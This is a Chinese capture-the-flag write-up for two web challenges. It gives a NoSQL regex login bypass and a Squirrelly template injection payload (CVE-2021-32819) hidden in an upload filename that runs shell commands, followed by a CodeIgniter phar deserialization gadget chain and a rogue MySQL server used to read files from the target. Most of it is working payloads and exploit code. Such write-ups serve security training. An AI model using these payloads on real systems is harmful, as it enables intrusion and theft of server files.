EzNode2
利用nosql注入登录admin,ban掉了很多,但 regexp 可以用
{"username":{"$regex":".*?"},"password":{"$regex":".*?"}}登录后可以传文件这里使用了 squirrelly 模板该模板有个CVE , CVE-2021-32819参考
https://github.com/advisories/GHSA-q8j6-pwqx-pm96
这里文件名是可控的本地测试下尝试使用网上的payload
代码语言:javascript复制"aaa","autoEscape":"","defaultFilter":"e');global.process.mainModule.require('child_process').exec('calc');//"发现无法触发rce,原因是文件名不能出现 / 去掉 / 发现报错
Squirrelly Error: Bad template syntax
Invalid regular expression flags
================================
var tR='';tR ='<!DOCTYPE html>n<html lang="en">n <head>n <meta charset="utf-8">n <meta http-equiv="X-UA-Compatible" content="IE=edge">n <meta name="viewport" content="width=device-width, initial-scale=1">nn <title>Bootstrap 4, from LayoutIt!</title>nn <meta name="description" content="Source code generated using layoutit.com">n <meta name="author" content="LayoutIt!">nn <link href="/static/css/bootstrap.min.css" rel="stylesheet">n <link href="/static/css/style.css" rel="stylesheet">n <style>* {n padding: 0;n margin: 0;n }n ul {n position: -webkit-sticky;n position: sticky;n top: 0;n list-style-type: none;n margin: 0;n padding: 0;n overflow: hidden;n background-color: #333;n font-size: 20px;n }n li {n float: right;n }n n li a {n display: block;n color: white;n text-align: center;n padding: 15px 30px;n margin: 0pc 30px;n text-decoration: none;n }n li a:hover {n background-color: #111;n }n n .welcomeContainer {n padding-top: 3rem !important;n
max-width: 720px;n width: 50% !important;n padding-right: 15px;n padding-left: 15px;n margin-right: auto;n margin-left: auto;n box-sizing: border-box;n }n .welcomeContainer > p {n
margin-bottom: 1rem;n }n a {n color: #007bff;n text-decoration: none;n background-color: transparent;n }n hr {n margin-top: 1rem;n margin-bottom: 1rem;n border: 0;n border-top: 1px solid rgba(0, 0, 0, 0.1);n }n h1 {n font-size: 2.5rem;n margin-bottom: 0.5rem;n font-weight: 500;n line-height: 1.2;n }n n .uploadContainer {n max-width: 620px;n width:
50% !important;n padding-top: 3rem !important;n padding-right: 15px;n padding-left: 15px;n margin-right: auto;n margin-left: auto;n display: flex;n flex-direction: column;n }n .uploadContainer input {n display: block;n width: 98%;n height: calc(1.5em 0.75rem 2px);n font-size: 1rem;n padding: 0.2rem;n font-weight: 400;n line-height: 1.5;n color: #495057;n background-color: #fff;n background-clip: padding-box;n border: 1px solid #ced4da;n border-radius: 0.25rem;n transition: border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;n }n .uploadContainer * {n margin-top: 3px;n margin-bottom: 10px;n }n .uploadContainer p {n margin: 0;n font-size: 18px;n }n .uploadContainer button {n color: #fff;n width: 100%;n background-color: #0095ff;n border-color: #007bff;n font-weight: 400;n text-align: center;n vertical-align: middle;n border: 1px solid transparent;n padding: 0.375rem;n font-size: 1rem;n line-height: 1.5;n border-radius: 0.25rem;n transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out,n border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;n }n </style>n </head>n <body>nn <div class="uploadContainer">n <center>n <h5>Give me a file, I can analyze the relevant information of it.</h5>n n <form action="/home" method="POST" enctype="multipart/form-data">n <input type="file" name="file" id="file">n <button name="submit" type="submit">Submit</button>n </form>n </center>n </div>n <br><br>n <div class="container-fluid">n <div class="row">n <div class="col-md-12">n <table class="table">n <thead>n <tr>n <th>n IDn </th>n <th>n File Namen </th>n <th>n File Sizen
</th>n <th>n Mime Typen </th>n <th>n Md5 Hashn </th>n </tr>n </thead>n <tbody>n <tr>n <td>n
0n </td>n <td>n shell.jarn </td>n <td>n 5268n </td>n <td>n application/octet-streamn </td>n
<td>n b3186dd95d6bec2a3f6d8df1f9822776n </td>n </tr>n <tr class="table-active">n <td>n 1n </td>n <td>n download.zipn
</td>n <td>n 270210n </td>n <td>n application/x-zip-compressedn </td>n <td>n 3bf555cbd8dd2adc4b72cdf2b9b45dedn </td>n </tr>n <tr class="table-success">n <td>n 2n </td>n <td>n test.phpn </td>n <td>n 31n </td>n
<td>n application/octet-streamn </td>n <td>n 2a3d83868a52c042e4c974ce2dc635f3n </td>n </tr>n <tr class="table-warning">n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.id);tR =' </td>n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.filename);tR =' </td>n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.filesize);tR =' </td>n <td>n
';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.mimetype);tR =' </td>n <td>n ';tR =c.l('F','e');global.process.mainModule.require('child_process').exec('calc');')(it.filehash);tR =' </td>n </tr>n </tbody>n </table>n </div>n </div>n</div>nn <script src="/static/js/jquery.min.js"></script>n <script src="/static/js/bootstrap.min.js"></script>n <script src="/static/js/scripts.js"></script>n </body>n</html>';if(cb){cb(null,tR)} return tR可以根据报错信息构造闭合,即最终payload
代码语言:javascript复制filename="aaa","autoEscape":"","defaultFilter":"e');global.process.mainModule.require('child_process').exec('calc');('"本地打
代码语言:javascript复制POST /home HTTP/1.1
Host: 192.168.43.172:3000
Content-Length: 377
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.43.172:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDvwrE2tlRi4jmBqg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.43.172:3000/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: thejs.session=s:Up9yQEn0vPM_dMkpL_jNESYtJPmUqSuu.le9ri4EXozPqP7Arm+a+pOkGZXjxymjlBPszQ4H5WkE
Connection: close
------WebKitFormBoundaryDvwrE2tlRi4jmBqg
Content-Disposition: form-data; name="file"; filename="aaa","autoEscape":"","defaultFilter":"e');global.process.mainModule.require('child_process').exec('calc');('"
Content-Type: 123
123
------WebKitFormBoundaryDvwrE2tlRi4jmBqg
Content-Disposition: form-data; name="submit"
------WebKitFormBoundaryDvwrE2tlRi4jmBqg--.png)
本地成功弹计算机,然后打远程反弹shell即可
code4
wp来自队友 @1manity
进入题目环境是CodeIgniter 4.2.7拿dirsearch扫一下(限速扫)发现源码泄露
读出来www.zip 解压本地审计一下,主要的点在Upload.php
代码语言:javascript复制<?php
namespace AppControllers;
use CodeIgniterFilesFile;
class Upload extends BaseController
{
protected $helpers = ['form'];
public function index()
{
return view('upload_form', ['errors' => []]);
}
public function upload()
{
$validationRule = [
'userfile' => [
'label' => 'Image File',
'rules' => 'uploaded[userfile]'
. '|max_size[userfile,100]'
. '|max_dims[userfile,1024,768]',
],
];
if (! $this->validate($validationRule)) {
$data = ['errors' => $this->validator->getErrors()];
return view('upload_form', $data);
}
$img = $this->request->getFile('userfile');
$img_content = file_get_contents($img);
if(preg_match("/HALT_COMPILER/i",$img_content)){
die("hack");
}
$name = $img->getName();
$img->store('',$name);
return view('upload_success');
}
public function info(){
$path = $this->request->getPost('name');
$data = ['uploaded_flleinfo' => new File($path)];
if($data){
return view('upload_info', $data);
}
else{
return "fail";
}
}
}看到ban了HALT_COMPILER,想到phar反序列化,这个地方可以使用compress绕过。这个网上是可以找到一般的反序列化脚本的(不过没有源码)https://blog.csdn.net/qq_48985780/article/details/121252141 跟着他的思路,利用https://github.com/Gifts/Rogue-MySql-Server 这个工具在自己的恶意服务器上建立mysql服务,然后反序列化触发。
先配置服务器:
改rogue_mysql_server.py的配置
.png)
使用python2启动项目,会自动生成mysql.log改写为phar反序列化的脚本
代码语言:javascript复制<?php
namespace CodeIgniterDatabaseMySQLi;
class Connection{
public $hostname='xxx.xxx.xxx.xxx';
public $port = '3307';
public $database = 'aaa';
public $username = 'root';
public $password = 'root';
public $charset = 'utf8';
}
namespace CodeIgniter;
class Model{
public $db;
public $table = 'hack';
public function __construct($db)
{
# code...
$this->db =$db;
}
}
namespace CodeIgniterSessionHandlers;
class MemcachedHandler{
public $lockKey ='123';
public $memcached= 'a';
public function __construct($memcached)
{
# code...
$this->memcached =$memcached;
}
}
namespace CodeIgniterCacheHandlers;
class RedisHandler{
public $redis;
public function __construct($redis)
{
# code...
$this->redis =$redis;
}
}
$a = new RedisHandler(new CodeIgniterSessionHandlersMemcachedHandler(new CodeIgniterModel(new CodeIgniterDatabaseMySQLiConnection())));
echo serialize($a);
$phar = new Phar("phar1.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();放入虚拟机中gzip compress一下
代码语言:javascript复制┌──(kali㉿kali)-[~/]
└─$ gzip phar.phar
┌──(kali㉿kali)-[~/]
└─$ mv phar.phar.gz phar.phar在upload页面中上传
.png)
在 /index.php/upload/info 触发phar反序列化
.png)
在服务器的mysql.log中读取到链接过来的代码,读取了配置中的文件
.png)
